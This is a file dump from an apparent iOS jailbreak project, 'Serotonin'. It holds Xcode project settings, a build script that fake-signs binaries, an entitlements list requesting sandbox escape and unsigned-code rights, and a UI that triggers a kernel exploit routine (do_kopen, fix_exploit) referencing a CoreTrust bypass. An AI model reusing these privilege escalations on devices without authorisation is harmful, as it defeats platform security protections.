/* Internal */, D6E08FE22B48E25F00AE49BF /* iOS */, D6E0900C2B48E25F00AE49BF /* UIBackport.swift */, ); path = SwiftUIBackports; sourceTree = ""; }; D6E08F622B48E25E00AE49BF /* Internal */ = { isa = PBXGroup; children = ( D6E08F632B48E25E00AE49BF /* Platforms.swift */, D6E08F642B48E25E00AE49BF /* SafeArea.swift */, D6E08F652B48E25E00AE49BF /* Environment.swift */, D6E08F662B48E25E00AE49BF /* Environment+String.swift */, D6E08F672B48E25E00AE49BF /* OwningController.swift */, D6E08F682B48E25E00AE49BF /* NSItemProvider+Async.swift */, D6E08F692B48E25E00AE49BF /* UIScene.swift */, D6E08F6A2B48E25E00AE49BF /* Inspect.swift */, D6E08F6B2B48E25E00AE49BF /* String+LocalizationKey.swift */, D6E08F6C2B48E25F00AE49BF /* VisualEffects */, ); path = Internal; sourceTree = ""; }; D6E08F6C2B48E25F00AE49BF /* VisualEffects */ = { isa = PBXGroup; children = ( D6E08F6D2B48E25F00AE49BF /* VisualEffect+iOS.swift */, D6E08F6E2B48E25F00AE49BF /* VisualEffect+macOS.swift */, ); path = VisualEffects; sourceTree = ""; }; D6E08FE22B48E25F00AE49BF /* iOS */ = { isa = PBXGroup; children = ( D6E090002B48E25F00AE49BF /* Presentation */, ); path = iOS; sourceTree = ""; }; D6E090002B48E25F00AE49BF /* Presentation */ = { isa = PBXGroup; children = ( D6E090022B48E25F00AE49BF /* Detents.swift */, ); path = Presentation; sourceTree = ""; }; D6E090862B48E3A200AE49BF /* FluidGradient */ = { isa = PBXGroup; children = ( D6E090872B48E3A200AE49BF /* BlobLayer.swift */, D6E090882B48E3A200AE49BF /* ResizableLayer.swift */, D6E090892B48E3A200AE49BF /* FluidGradientView.swift */, D6E0908A2B48E3A200AE49BF /* CGPoint+Extensions.swift */, D6E0908B2B48E3A200AE49BF /* FluidGradient.swift */, ); path = FluidGradient; sourceTree = ""; }; D6E090912B48E60300AE49BF /* Private Headers I stole from the macOS SDK */ = { isa = PBXGroup; children = ( D6E090922B48E60300AE49BF /* bootstrap.h */, D6E090932B48E60300AE49BF /* xpc */, ); path = "Private Headers I stole from the macOS SDK"; sourceTree = ""; }; D6E090932B48E60300AE49BF /* xpc */ = { isa = PBXGroup; children = ( D6E090942B48E60300AE49BF /* endpoint.h */, D6E090952B48E60300AE49BF /* debug.h */, D6E090962B48E60300AE49BF /* listener.h */, D6E090972B48E60300AE49BF /* availability.h */, D6E090982B48E60300AE49BF /* rich_error.h */, D6E090992B48E60300AE49BF /* xpc.h */, D6E0909A2B48E60300AE49BF /* session.h */, D6E0909B2B48E60300AE49BF /* xpc_connection.h */, D6E0909C2B48E60300AE49BF /* activity.h */, D6E0909D2B48E60300AE49BF /* launch.h */, D6E0909E2B48E60300AE49BF /* base.h */, ); path = xpc; sourceTree = ""; }; /* End PBXGroup section */ /* Begin PBXNativeTarget section */ C81122992B15E7BB00AD077B /* usprebooter */ = { isa = PBXNativeTarget; buildConfigurationList = C81122C42B15E7BD00AD077B /* Build configuration list for PBXNativeTarget "usprebooter" */; buildPhases = ( C81122962B15E7BB00AD077B /* Sources */, C81122972B15E7BB00AD077B /* Frameworks */, C81122982B15E7BB00AD077B /* Resources */, ); buildRules = ( ); dependencies = ( ); name = usprebooter; packageProductDependencies = ( ); productName = usprebooter; productReference = C811229A2B15E7BB00AD077B /* usprebooter.app */; productType = "com.apple.product-type.application"; }; /* End PBXNativeTarget section */ /* Begin PBXProject section */ C81122922B15E7BB00AD077B /* Project object */ = { isa = PBXProject; attributes = { BuildIndependentTargetsInParallel = 1; LastSwiftUpdateCheck = 1500; LastUpgradeCheck = 1500; TargetAttributes = { C81122992B15E7BB00AD077B = { CreatedOnToolsVersion = 15.0.1; LastSwiftMigration = 1500; }; }; }; buildConfigurationList = C81122952B15E7BB00AD077B /* Build configuration list for PBXProject "Serotonin" */; compatibilityVersion = "Xcode 14.0"; developmentRegion = en; hasScannedForEncodings = 0; knownRegions = ( en, Base, ); mainGroup = C81122912B15E7BB00AD077B; packageReferences = ( ); productRefGroup = C811229B2B15E7BB00AD077B /* Products */; projectDirPath = ""; projectReferences = ( { ProductGroup = C82AFF2F2B1762CE0070EA49 /* Products */; ProjectRef = C82AFF2E2B1762CE0070EA49 /* RootHelperSample.xcodeproj */; }, ); projectRoot = ""; targets = ( C81122992B15E7BB00AD077B /* usprebooter */, ); }; /* End PBXProject section */ /* Begin PBXResourcesBuildPhase section */ C81122982B15E7BB00AD077B /* Resources */ = { isa = PBXResourcesBuildPhase; buildActionMask = 2147483647; files = ( D6F9CF412B4B306400274803 /* fastPathSign in Resources */, D6F9CF3F2B4B2F7D00274803 /* ct_bypass in Resources */, C82AFEF42B175AB80070EA49 /* Assets.xcassets in Resources */, C84002E92B4A55A300C73950 /* springboardshimsignedinjected in Resources */, C84002ED2B4A64E200C73950 /* launchdentitlements.plist in Resources */, C82AFF432B17AA6D0070EA49 /* ldid in Resources */, ); runOnlyForDeploymentPostprocessing = 0; }; /* End PBXResourcesBuildPhase section */ /* Begin PBXSourcesBuildPhase section */ C81122962B15E7BB00AD077B /* Sources */ = { isa = PBXSourcesBuildPhase; buildActionMask = 2147483647; files = ( D6E08F552B48E24F00AE49BF /* URL+Transferable.swift in Sources */, C805CA452B1719C1005157BA /* util.m in Sources */, C8BFCCAA2B3FFE570008D8FD /* cs_blobs.m in Sources */, C81122DF2B16C9CC00AD077B /* troller.m in Sources */, C8BFCCA82B3FFE570008D8FD /* utils.m in Sources */, D6E08F4B2B48E24F00AE49BF /* CoreTypes.swift in Sources */, D6E0908E2B48E3A200AE49BF /* FluidGradientView.swift in Sources */, D6E08F5F2B48E24F00AE49BF /* TransferableRepresentation.swift in Sources */, D6E090112B48E26000AE49BF /* OwningController.swift in Sources */, D6E08F542B48E24F00AE49BF /* Data+Transferable.swift in Sources */, C83594D22B18F74600346F80 /* vm_unaligned_copy_switch_race.c in Sources */, D6E090162B48E26000AE49BF /* VisualEffect+iOS.swift in Sources */, D6E08F562B48E24F00AE49BF /* String+Transferable.swift in Sources */, D6E08F522B48E24F00AE49BF /* _ConditionalRepresentation.swift in Sources */, C83594CF2B18F70700346F80 /* overwriter.m in Sources */, D6E08F1E2B48B04E00AE49BF /* TheCoolerContentView.swift in Sources */, D6E08F5D2B48E24F00AE49BF /* Transferable.swift in Sources */, D6E08F502B48E24F00AE49BF /* Codable+Representation.swift in Sources */, D6E0908D2B48E3A200AE49BF /* ResizableLayer.swift in Sources */, D6E090122B48E26000AE49BF /* NSItemProvider+Async.swift in Sources */, C82AFF3A2B1768990070EA49 /* ContentView.swift in Sources */, D6E0900E2B48E26000AE49BF /* SafeArea.swift in Sources */, C82AFF392B17688E0070EA49 /* usprebooterApp.swift in Sources */, D6E090132B48E26000AE49BF /* UIScene.swift in Sources */, C8BFCCB42B427C0F0008D8FD /* Log.swift in Sources */, D6E08F4D2B48E24F00AE49BF /* URLSession+Async.swift in Sources */, D6E08F5E2B48E24F00AE49BF /* TransferRepresentationBuilder.swift in Sources */, D6E08F532B48E24F00AE49BF /* File+Representations.swift in Sources */, D6E0908C2B48E3A200AE49BF /* BlobLayer.swift in Sources */, D6E08F582B48E24F00AE49BF /* AttributedString+Transferable.swift in Sources */, C8BFCCA62B3FFE570008D8FD /* dir.m in Sources */, D6E0908F2B48E3A200AE49BF /* CGPoint+Extensions.swift in Sources */, D6E0907C2B48E26000AE49BF /* Detents.swift in Sources */, C8BFCCAC2B3FFE570008D8FD /* offsets.m in Sources */, D6E08F5C2B48E24F00AE49BF /* NSItemProvider+Transferable.swift in Sources */, C8BFCCA42B3FFE570008D8FD /* fun.m in Sources */, C8BFCCAB2B3FFE570008D8FD /* krw.c in Sources */, D6E090152B48E26000AE49BF /* String+LocalizationKey.swift in Sources */, D6E08F4C2B48E24F00AE49BF /* UTType.swift in Sources */, D6E0900F2B48E26000AE49BF /* Environment.swift in Sources */, D6E08F572B48E24F00AE49BF /* Never+Transferable.swift in Sources */, D6E08F4E2B48E24F00AE49BF /* Never+Representation.swift in Sources */, C8BFCCAE2B3FFE570008D8FD /* proc.c in Sources */, D6E090172B48E26000AE49BF /* VisualEffect+macOS.swift in Sources */, D6E08F592B48E24F00AE49BF /* Visibility.swift in Sources */, D6E08F4A2B48E24F00AE49BF /* UTTagClass.swift in Sources */, D6E08F5A2B48E24F00AE49BF /* SentTransferredFile.swift in Sources */, 013141FF2B445B26006BEBE9 /* memoryControl.m in Sources */, D6E090102B48E26000AE49BF /* Environment+String.swift in Sources */, D6E090142B48E26000AE49BF /* Inspect.swift in Sources */, D6E08F5B2B48E24F00AE49BF /* ReceivedTransferredFile.swift in Sources */, D6E08F4F2B48E24F00AE49BF /* Tuple+Representation.swift in Sources */, D6E090852B48E26000AE49BF /* UIBackport.swift in Sources */, D6E090902B48E3A200AE49BF /* FluidGradient.swift in Sources */, C8BFCCAD2B3FFE570008D8FD /* vnode.m in Sources */, D6E0900D2B48E26000AE49BF /* Platforms.swift in Sources */, D6E08F512B48E24F00AE49BF /* Data+Representation.swift in Sources */, C8BFCCA92B3FFE570008D8FD /* thanks_opa334dev_htrowii.m in Sources */, D6E08F602B48E24F00AE49BF /* Backport.swift in Sources */, ); runOnlyForDeploymentPostprocessing = 0; }; /* End PBXSourcesBuildPhase section */ /* Begin XCBuildConfiguration section */ C81122C22B15E7BD00AD077B /* Debug */ = { isa = XCBuildConfiguration; buildSettings = { ALWAYS_SEARCH_USER_PATHS = NO; ASSETCATALOG_COMPILER_GENERATE_SWIFT_ASSET_SYMBOL_EXTENSIONS = YES; CLANG_ANALYZER_NONNULL = YES; CLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE; CLANG_CXX_LANGUAGE_STANDARD = "gnu++20"; CLANG_ENABLE_MODULES = YES; CLANG_ENABLE_OBJC_ARC = YES; CLANG_ENABLE_OBJC_WEAK = YES; CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES; CLANG_WARN_BOOL_CONVERSION = YES; CLANG_WARN_COMMA = YES; CLANG_WARN_CONSTANT_CONVERSION = YES; CLANG_WARN_DEPRECATED_OBJC_IMPLEMENTATIONS = YES; CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR; CLANG_WARN_DOCUMENTATION_COMMENTS = YES; CLANG_WARN_EMPTY_BODY = YES; CLANG_WARN_ENUM_CONVERSION = YES; CLANG_WARN_INFINITE_RECURSION = YES; CLANG_WARN_INT_CONVERSION = YES; CLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES; CLANG_WARN_OBJC_IMPLICIT_RETAIN_SELF = YES; CLANG_WARN_OBJC_LITERAL_CONVERSION = YES; CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR; CLANG_WARN_QUOTED_INCLUDE_IN_FRAMEWORK_HEADER = YES; CLANG_WARN_RANGE_LOOP_ANALYSIS = YES; CLANG_WARN_STRICT_PROTOTYPES = YES; CLANG_WARN_SUSPICIOUS_MOVE = YES; CLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE; CLANG_WARN_UNREACHABLE_CODE = YES; CLANG_WARN__DUPLICATE_METHOD_MATCH = YES; COPY_PHASE_STRIP = NO; DEBUG_INFORMATION_FORMAT = dwarf; ENABLE_STRICT_OBJC_MSGSEND = YES; ENABLE_TESTABILITY = YES; ENABLE_USER_SCRIPT_SANDBOXING = YES; GCC_C_LANGUAGE_STANDARD = gnu17; GCC_DYNAMIC_NO_PIC = NO; GCC_NO_COMMON_BLOCKS = YES; GCC_OPTIMIZATION_LEVEL = 0; GCC_PREPROCESSOR_DEFINITIONS = ( "DEBUG=1", "$(inherited)", ); GCC_WARN_64_TO_32_BIT_CONVERSION = YES; GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR; GCC_WARN_UNDECLARED_SELECTOR = YES; GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE; GCC_WARN_UNUSED_FUNCTION = YES; GCC_WARN_UNUSED_VARIABLE = YES; IPHONEOS_DEPLOYMENT_TARGET = 17.0; LOCALIZATION_PREFERS_STRING_CATALOGS = YES; MTL_ENABLE_DEBUG_INFO = INCLUDE_SOURCE; MTL_FAST_MATH = YES; ONLY_ACTIVE_ARCH = YES; SDKROOT = iphoneos; SWIFT_ACTIVE_COMPILATION_CONDITIONS = "DEBUG $(inherited)"; SWIFT_OPTIMIZATION_LEVEL = "-Onone"; }; name = Debug; }; C81122C32B15E7BD00AD077B /* Release */ = { isa = XCBuildConfiguration; buildSettings = { ALWAYS_SEARCH_USER_PATHS = NO; ASSETCATALOG_COMPILER_GENERATE_SWIFT_ASSET_SYMBOL_EXTENSIONS = YES; CLANG_ANALYZER_NONNULL = YES; CLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE; CLANG_CXX_LANGUAGE_STANDARD = "gnu++20"; CLANG_ENABLE_MODULES = YES; CLANG_ENABLE_OBJC_ARC = YES; CLANG_ENABLE_OBJC_WEAK = YES; CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES; CLANG_WARN_BOOL_CONVERSION = YES; CLANG_WARN_COMMA = YES; CLANG_WARN_CONSTANT_CONVERSION = YES; CLANG_WARN_DEPRECATED_OBJC_IMPLEMENTATIONS = YES; CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR; CLANG_WARN_DOCUMENTATION_COMMENTS = YES; CLANG_WARN_EMPTY_BODY = YES; CLANG_WARN_ENUM_CONVERSION = YES; CLANG_WARN_INFINITE_RECURSION = YES; CLANG_WARN_INT_CONVERSION = YES; CLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES; CLANG_WARN_OBJC_IMPLICIT_RETAIN_SELF = YES; CLANG_WARN_OBJC_LITERAL_CONVERSION = YES; CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR; CLANG_WARN_QUOTED_INCLUDE_IN_FRAMEWORK_HEADER = YES; CLANG_WARN_RANGE_LOOP_ANALYSIS = YES; CLANG_WARN_STRICT_PROTOTYPES = YES; CLANG_WARN_SUSPICIOUS_MOVE = YES; CLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE; CLANG_WARN_UNREACHABLE_CODE = YES; CLANG_WARN__DUPLICATE_METHOD_MATCH = YES; COPY_PHASE_STRIP = NO; DEBUG_INFORMATION_FORMAT = "dwarf-with-dsym"; ENABLE_NS_ASSERTIONS = NO; ENABLE_STRICT_OBJC_MSGSEND = YES; ENABLE_USER_SCRIPT_SANDBOXING = YES; GCC_C_LANGUAGE_STANDARD = gnu17; GCC_NO_COMMON_BLOCKS = YES; GCC_WARN_64_TO_32_BIT_CONVERSION = YES; GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR; GCC_WARN_UNDECLARED_SELECTOR = YES; GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE; GCC_WARN_UNUSED_FUNCTION = YES; GCC_WARN_UNUSED_VARIABLE = YES; IPHONEOS_DEPLOYMENT_TARGET = 17.0; LOCALIZATION_PREFERS_STRING_CATALOGS = YES; MTL_ENABLE_DEBUG_INFO = NO; MTL_FAST_MATH = YES; SDKROOT = iphoneos; SWIFT_COMPILATION_MODE = wholemodule; VALIDATE_PRODUCT = YES; }; name = Release; }; C81122C52B15E7BD00AD077B /* Debug */ = { isa = XCBuildConfiguration; buildSettings = { ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; ASSETCATALOG_COMPILER_GLOBAL_ACCENT_COLOR_NAME = AccentColor; CLANG_ENABLE_MODULES = YES; CODE_SIGN_IDENTITY = ""; CODE_SIGN_STYLE = Automatic; CURRENT_PROJECT_VERSION = 1; DEVELOPMENT_TEAM = ""; GENERATE_INFOPLIST_FILE = YES; INFOPLIST_FILE = usprebooter/Info.plist; INFOPLIST_KEY_CFBundleDisplayName = Serotonin; INFOPLIST_KEY_LSApplicationCategoryType = "public.app-category.utilities"; INFOPLIST_KEY_UIApplicationSupportsIndirectInputEvents = YES; INFOPLIST_KEY_UILaunchStoryboardName = LaunchScreen; INFOPLIST_KEY_UIMainStoryboardFile = Main; INFOPLIST_KEY_UISupportedInterfaceOrientations_iPad = "UIInterfaceOrientationPortrait UIInterfaceOrientationPortraitUpsideDown UIInterfaceOrientationLandscapeLeft UIInterfaceOrientationLandscapeRight"; INFOPLIST_KEY_UISupportedInterfaceOrientations_iPhone = "UIInterfaceOrientationPortrait UIInterfaceOrientationLandscapeLeft UIInterfaceOrientationLandscapeRight"; IPHONEOS_DEPLOYMENT_TARGET = 15.5; LD_RUNPATH_SEARCH_PATHS = ( "$(inherited)", "@executable_path/Frameworks", ); LIBRARY_SEARCH_PATHS = ( "$(inherited)", "$(PROJECT_DIR)/RootHelperSample/launchdshim/launchdhook", "$(PROJECT_DIR)/RootHelperSample/launchdshim/SpringBoardShim/SpringBoardHook", ); MARKETING_VERSION = 1.0; PRODUCT_BUNDLE_IDENTIFIER = pisshill.usprebooter; PRODUCT_NAME = "$(TARGET_NAME)"; SWIFT_EMIT_LOC_STRINGS = YES; SWIFT_OBJC_BRIDGING_HEADER = "usprebooter/usprebooter-Bridging-Header.h"; SWIFT_OPTIMIZATION_LEVEL = "-Onone"; SWIFT_VERSION = 5.0; TARGETED_DEVICE_FAMILY = "1,2"; }; name = Debug; }; C81122C62B15E7BD00AD077B /* Release */ = { isa = XCBuildConfiguration; buildSettings = { ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; ASSETCATALOG_COMPILER_GLOBAL_ACCENT_COLOR_NAME = AccentColor; CLANG_ENABLE_MODULES = YES; CODE_SIGN_IDENTITY = ""; CODE_SIGN_STYLE = Automatic; CURRENT_PROJECT_VERSION = 1; DEVELOPMENT_TEAM = ""; GENERATE_INFOPLIST_FILE = YES; INFOPLIST_FILE = usprebooter/Info.plist; INFOPLIST_KEY_CFBundleDisplayName = Serotonin; INFOPLIST_KEY_LSApplicationCategoryType = "public.app-category.utilities"; INFOPLIST_KEY_UIApplicationSupportsIndirectInputEvents = YES; INFOPLIST_KEY_UILaunchStoryboardName = LaunchScreen; INFOPLIST_KEY_UIMainStoryboardFile = Main; INFOPLIST_KEY_UISupportedInterfaceOrientations_iPad = "UIInterfaceOrientationPortrait UIInterfaceOrientationPortraitUpsideDown UIInterfaceOrientationLandscapeLeft UIInterfaceOrientationLandscapeRight"; INFOPLIST_KEY_UISupportedInterfaceOrientations_iPhone = "UIInterfaceOrientationPortrait UIInterfaceOrientationLandscapeLeft UIInterfaceOrientationLandscapeRight"; IPHONEOS_DEPLOYMENT_TARGET = 15.5; LD_RUNPATH_SEARCH_PATHS = ( "$(inherited)", "@executable_path/Frameworks", ); LIBRARY_SEARCH_PATHS = ( "$(inherited)", "$(PROJECT_DIR)/RootHelperSample/launchdshim/launchdhook", "$(PROJECT_DIR)/RootHelperSample/launchdshim/SpringBoardShim/SpringBoardHook", ); MARKETING_VERSION = 1.0; PRODUCT_BUNDLE_IDENTIFIER = pisshill.usprebooter; PRODUCT_NAME = "$(TARGET_NAME)"; SWIFT_EMIT_LOC_STRINGS = YES; SWIFT_OBJC_BRIDGING_HEADER = "usprebooter/usprebooter-Bridging-Header.h"; SWIFT_VERSION = 5.0; TARGETED_DEVICE_FAMILY = "1,2"; }; name = Release; }; /* End XCBuildConfiguration section */ /* Begin XCConfigurationList section */ C81122952B15E7BB00AD077B /* Build configuration list for PBXProject "Serotonin" */ = { isa = XCConfigurationList; buildConfigurations = ( C81122C22B15E7BD00AD077B /* Debug */, C81122C32B15E7BD00AD077B /* Release */, ); defaultConfigurationIsVisible = 0; defaultConfigurationName = Release; }; C81122C42B15E7BD00AD077B /* Build configuration list for PBXNativeTarget "usprebooter" */ = { isa = XCConfigurationList; buildConfigurations = ( C81122C52B15E7BD00AD077B /* Debug */, C81122C62B15E7BD00AD077B /* Release */, ); defaultConfigurationIsVisible = 0; defaultConfigurationName = Release; }; /* End XCConfigurationList section */ }; rootObject = C81122922B15E7BB00AD077B /* Project object */; } ================================================ FILE: Serotonin.xcodeproj/project.xcworkspace/contents.xcworkspacedata ================================================ ================================================ FILE: Serotonin.xcodeproj/project.xcworkspace/xcshareddata/IDEWorkspaceChecks.plist ================================================ IDEDidComputeMac32BitWarning ================================================ FILE: Serotonin.xcodeproj/xcuserdata/hariz.xcuserdatad/xcschemes/xcschememanagement.plist ================================================ SchemeUserState usprebooter.xcscheme_^#shared#^_ orderHint 0 ================================================ FILE: Serotonin.xcodeproj/xcuserdata/ibarahime.xcuserdatad/xcdebugger/Breakpoints_v2.xcbkptlist ================================================ ================================================ FILE: Serotonin.xcodeproj/xcuserdata/ibarahime.xcuserdatad/xcschemes/xcschememanagement.plist ================================================ SchemeUserState usprebooter.xcscheme_^#shared#^_ orderHint 0 ================================================ FILE: build.sh ================================================ #!/bin/sh set -e # why wasn't this there earlier – bomberfish echo "Building IPA" xcodebuild clean build -sdk iphoneos -configuration Release CODE_SIGN_IDENTITY="" CODE_SIGNING_REQUIRED=NO CODE_SIGNING_ALLOWED="NO" echo "done building" cd RootHelperSample ldid -Sentitlements.plist -Cadhoc ../usprebooter/ldid ldid -Sentitlements.plist -Cadhoc ../usprebooter/fastPathSign gmake -j$(sysctl -n hw.ncpu) ldid -Sentitlements.plist -Cadhoc .theos/obj/debug/arm64/trolltoolsroothelper mv .theos/obj/debug/arm64/trolltoolsroothelper ../build/Release-iphoneos/usprebooter.app/trolltoolsroothelper cd ../build/Release-iphoneos rm -rf Payload rm -rf FUCK.tipa mkdir Payload cp -r usprebooter.app Payload ldid -S../../ent.plist -Cadhoc Payload/usprebooter.app/usprebooter zip -vr FUCK.tipa Payload/ -x "*.DS_Store" ================================================ FILE: ent.plist ================================================ com.apple.developer.kernel.increased-memory-limit com.apple.private.domain-extension com.apple.private.security.container-required com.apple.private.security.no-container com.apple.private.security.no-sandbox com.apple.private.xpc.domain-extension com.apple.private.xpc.domain-extension.proxy com.apple.private.xpc.launchd.app-state-manager com.apple.private.xpc.launchd.enable-disable-system-services com.apple.private.xpc.launchd.event-monitor com.apple.private.xpc.launchd.loginitem-bootstrapper com.apple.private.xpc.launchd.loginitem-outside-bundle com.apple.private.xpc.launchd.obliterator com.apple.private.xpc.launchd.per-user-create.mbsetupuser com.apple.private.xpc.launchd.per-user-lookup com.apple.private.xpc.launchd.reboot com.apple.private.xpc.launchd.service-hold com.apple.private.xpc.launchd.userspace-reboot com.apple.private.xpc.launchd.userspace-reboot-now com.apple.private.xpc.persona-creator com.apple.private.xpc.persona-manager com.apple.private.persona-mgmt com.apple.private.xpc.service-attach com.apple.private.xpc.service-configure platform-application get-task-allow task_for_pid-allow run-unsigned-code com.apple.system-task-ports com.apple.private.security.storage.AppBundles com.apple.private.security.storage.AppDataContainers com.apple.security.iokit-user-client-class AGXDevice AGXCommandQueue AGXSharedUserClient AGXDeviceUserClient iokit-open-user-client IOSurfaceRootUserClient com.apple.developer.driverkit com.apple.developer.driverkit.userclient-access com.apple.private.memorystatus com.apple.security.exception.mach-lookup.global-name com.apple.mmaintenanced com.apple.memory-maintenance com.apple.AutoWake-write-access com.apple.springboard.wallpaper-access com.apple.features.all-access com.apple.springboard.appbackgroundstyle com.apple.springboard.wallpaperAnimationSuspension ================================================ FILE: usprebooter/Assets.xcassets/AccentColor.colorset/Contents.json ================================================ { "colors" : [ { "color" : { "color-space" : "srgb", "components" : { "alpha" : "1.000", "blue" : "0.404", "green" : "0.255", "red" : "0.776" } }, "idiom" : "universal" } ], "info" : { "author" : "xcode", "version" : 1 } } ================================================ FILE: usprebooter/Assets.xcassets/AppIcon.appiconset/Contents.json ================================================ { "images" : [ { "filename" : "serotonin.png", "idiom" : "universal", "platform" : "ios", "size" : "1024x1024" } ], "info" : { "author" : "xcode", "version" : 1 } } ================================================ FILE: usprebooter/Assets.xcassets/Contents.json ================================================ { "info" : { "author" : "xcode", "version" : 1 } } ================================================ FILE: usprebooter/Assets.xcassets/accent.colorset/Contents.json ================================================ { "colors" : [ { "color" : { "color-space" : "srgb", "components" : { "alpha" : "1.000", "blue" : "0.404", "green" : "0.255", "red" : "0.776" } }, "idiom" : "universal" } ], "info" : { "author" : "xcode", "version" : 1 } } ================================================ FILE: usprebooter/Assets.xcassets/alfienick.imageset/Contents.json ================================================ { "images" : [ { "filename" : "alfienick.png", "idiom" : "universal" } ], "info" : { "author" : "xcode", "version" : 1 } } ================================================ FILE: usprebooter/Assets.xcassets/bedtime.imageset/Contents.json ================================================ { "images" : [ { "filename" : "bedtime.jpg", "idiom" : "universal" } ], "info" : { "author" : "xcode", "version" : 1 } } ================================================ FILE: usprebooter/Assets.xcassets/duy.imageset/Contents.json ================================================ { "images" : [ { "filename" : "duy.jpg", "idiom" : "universal" } ], "info" : { "author" : "xcode", "version" : 1 } } ================================================ FILE: usprebooter/Assets.xcassets/fish.imageset/Contents.json ================================================ { "images" : [ { "filename" : "bomberfish-picasso.png", "idiom" : "universal" } ], "info" : { "author" : "xcode", "version" : 1 } } ================================================ FILE: usprebooter/Assets.xcassets/haxi0.imageset/Contents.json ================================================ { "images" : [ { "filename" : "haxi0.jpg", "idiom" : "universal" } ], "info" : { "author" : "xcode", "version" : 1 } } ================================================ FILE: usprebooter/Assets.xcassets/htrowii.imageset/Contents.json ================================================ { "images" : [ { "filename" : "htrowii.jpg", "idiom" : "universal" } ], "info" : { "author" : "xcode", "version" : 1 } } ================================================ FILE: usprebooter/ContentView.swift ================================================ import SwiftUI struct ContentView: View { @State var LogItems: [String.SubSequence] = [""] @AppStorage("headroom") var staticHeadroomMB: Double = 384.0 @AppStorage("pages") var pUaFPages: Double = 3072.0 @Binding var useNewUI: Bool var body: some View { // thx haxi0 VStack { HStack { Button("do the thing!") { DispatchQueue.main.async { do_kopen(UInt64(pUaFPages), 1, 1, 1, Int(staticHeadroomMB), true) fix_exploit() go() do_kclose() } } Button("reboot userspace") { userspaceReboot() } } let memSizeMB = getPhysicalMemorySize() / 1048576 HStack { Text("Headroom: \(Int(staticHeadroomMB))") Slider(value: $staticHeadroomMB, in: 0...Double(memSizeMB), step: 128.0) } HStack { Text("puaf pages: \(Int(pUaFPages))") Slider(value: $pUaFPages, in: 16...4096, step: 16.0) } ScrollView { ScrollViewReader { scroll in VStack(alignment: .leading) { ForEach(0 ..< LogItems.count, id: \.self) { LogItem in Text("\(String(LogItems[LogItem]))") .textSelection(.enabled) .font(.custom("Menlo", size: 10)) .foregroundColor(.white) } } .onReceive(NotificationCenter.default.publisher(for: LogStream.shared.reloadNotification)) { _ in DispatchQueue.global(qos: .utility).async { FetchLog() scroll.scrollTo(LogItems.count - 1) } } } } .frame(height: 230) } .padding(20) .background { Color(.black) .cornerRadius(20) .opacity(0.5) } Button("Back to new UI", systemImage: "switch.2") { withAnimation(fancyAnimation) { useNewUI.toggle() } } } private func FetchLog() { guard let AttributedText = LogStream.shared.outputString.copy() as? NSAttributedString else { LogItems = ["Error Getting Log!"] return } LogItems = AttributedText.string.split(separator: "\n") } } // #Preview { // ContentView() // } ================================================ FILE: usprebooter/External/FluidGradient/BlobLayer.swift ================================================ // // BlobLayer.swift // BlobLayer // // Created by João Gabriel Pozzobon dos Santos on 04/10/22. // import SwiftUI /// A CALayer that draws a single blob on the screen public class BlobLayer: CAGradientLayer { init(color: Color) { super.init() self.type = .radial #if os(OSX) autoresizingMask = [.layerWidthSizable, .layerHeightSizable] #endif // Set color set(color: color) // Center point let position = newPosition() self.startPoint = position // Radius let radius = newRadius() self.endPoint = position.displace(by: radius) } /// Generate a random point on the canvas func newPosition() -> CGPoint { return CGPoint(x: CGFloat.random(in: 0.0...1.0), y: CGFloat.random(in: 0.0...1.0)).capped() } /// Generate a random radius for the blob func newRadius() -> CGPoint { let size = CGFloat.random(in: 0.15...0.75) let viewRatio = frame.width/frame.height let safeRatio = max(viewRatio.isNaN ? 1 : viewRatio, 1) let ratio = safeRatio*CGFloat.random(in: 0.25...1.75) return CGPoint(x: size, y: size*ratio) } /// Animate the blob to a random point and size on screen at set speed func animate(speed: CGFloat) { guard speed > 0 else { return } self.removeAllAnimations() let currentLayer = self.presentation() ?? self let animation = CASpringAnimation() animation.mass = 10/speed animation.damping = 50 animation.duration = 1/speed animation.isRemovedOnCompletion = false animation.fillMode = CAMediaTimingFillMode.forwards let position = newPosition() let radius = newRadius() // Center point let start = animation.copy() as! CASpringAnimation start.keyPath = "startPoint" start.fromValue = currentLayer.startPoint start.toValue = position // Radius let end = animation.copy() as! CASpringAnimation end.keyPath = "endPoint" end.fromValue = currentLayer.endPoint end.toValue = position.displace(by: radius) self.startPoint = position self.endPoint = position.displace(by: radius) // Opacity let value = Float.random(in: 0.5...1) let opacity = animation.copy() as! CASpringAnimation opacity.fromValue = self.opacity opacity.toValue = value self.opacity = value self.add(opacity, forKey: "opacity") self.add(start, forKey: "startPoint") self.add(end, forKey: "endPoint") } /// Set the color of the blob func set(color: Color) { // Converted to the system color so that cgColor isn't nil self.colors = [SystemColor(color).cgColor, SystemColor(color).cgColor, SystemColor(color.opacity(0.0)).cgColor] self.locations = [0.0, 0.9, 1.0] } required init?(coder: NSCoder) { fatalError("init(coder:) has not been implemented") } // Required by the framework public override init(layer: Any) { super.init(layer: layer) } } ================================================ FILE: usprebooter/External/FluidGradient/CGPoint+Extensions.swift ================================================ // // CGPoint+Extensions.swift // // // Created by João Gabriel Pozzobon dos Santos on 03/10/22. // import CoreGraphics extension CGPoint { /// Build a point from an origin and a displacement func displace(by point: CGPoint = .init(x: 0.0, y: 0.0)) -> CGPoint { return CGPoint(x: self.x+point.x, y: self.y+point.y) } /// Caps the point to the unit space func capped() -> CGPoint { return CGPoint(x: max(min(x, 1), 0), y: max(min(y, 1), 0)) } } ================================================ FILE: 